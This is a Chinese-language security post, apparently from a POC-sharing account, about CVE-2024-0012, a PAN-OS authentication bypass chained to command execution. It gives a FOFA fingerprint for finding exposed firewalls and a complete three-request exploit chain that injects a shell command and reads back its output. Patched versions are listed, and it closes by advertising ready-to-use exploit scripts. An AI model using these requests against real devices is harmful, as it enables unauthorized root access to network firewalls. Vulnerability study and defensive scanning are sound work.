Palo Alto Networks PAN-OS身份认证绕过导致RCE漏洞(CVE-2024-0012)

Superhero nday POC 2024-12-02 07:43

内容仅用于学习交流自查使用，由于传播、利用本公众号所提供的
POC
信息及
POC对应脚本
而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号nday poc及作者不为此承担任何责任，一旦造成后果请自行承担！如文章有侵权烦请及时告知，我们会立即删除文章并致歉。谢谢！

00****

产品简介

PAN-OS 是运行 Palo Alto Networks 下一代防火墙的软件。通过利用 PAN-OS 本机内置的关键技术（App-ID、Content-ID、设备 ID 和用户 ID），可以在任何时间、任何地点完全了解和控制所有用户和设备中正在使用的应用程序。

01****

漏洞概述

PAN-OS 设备管理WEB界面中存在身份认证绕过漏洞，未经身份验证的远程攻击者可以通过网络访问管理 Web 界面，从而进行后续活动，包括修改设备配置、访问其他管理功能以及利用 Palo Alto Networks PAN-OS 权限提升漏洞(CVE-2024-9474)获取root访问权限，执行任意命令，目前该漏洞技术细节与PoC已在互联网上公开，鉴于此漏洞已发现在野利用，建议用户尽快做好自查及防护。

02****

搜索引擎

FOFA:

icon_hash="873381299"

03****

漏洞复现

1、身份认证绕过获取cookie并注入命令

POST /php/utils/createRemoteAppwebSession.php/rce.js.map HTTP/1.1
Host: 
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded

user=`echo $(ifconfig) > /var/appweb/htdocs/unauth/rce.php`&userRole=superuser&remoteHost=&vsys=vsys1

2、携带cookie权限提升并执行命令

GET /index.php/.js.map HTTP/1.1
Host: 
Cookie: 上一步返回的cookie
X-PAN-AUTHCHECK: off
Connection: keep-alive

3、获取命令执行结果

GET /unauth/rce.php HTTP/1.1
Host: 
Cookie: 上一步获取的cookie
X-PAN-AUTHCHECK: off
Connection: keep-alive

04

检测工具

nuclei

afrog

xray

05****

修复建议

1、关闭互联网暴露面或接口设置访问权限

2、目前官方已有可更新版本，建议受影响用户升级至最新版本：

PAN-OS 10.1 >= 10.1.14-h6

PAN-OS 10.2 >= 10.2.12-h2

PAN-OS 11.0 >= 11.0.6-h1

PAN-OS 11.1 >= 11.1.5-h1

PAN-OS 11.2 >= 11.2.4-h1

请参阅发布说明：

https://security.paloaltonetworks.com/CVE-2024-0012

06****

内部圈子介绍

1、本圈子主要是分享网上公布的1day/nday POC详情及对应检测脚本，目前POC脚本均支持xray、afrog、nuclei等三款常用工具。

2、三款工具都支持内置poc+自写poc目录一起扫描。

3、保持每周更新10-15个poc。

4、所发布的POC脚本均已测试完毕，直接拿来即用。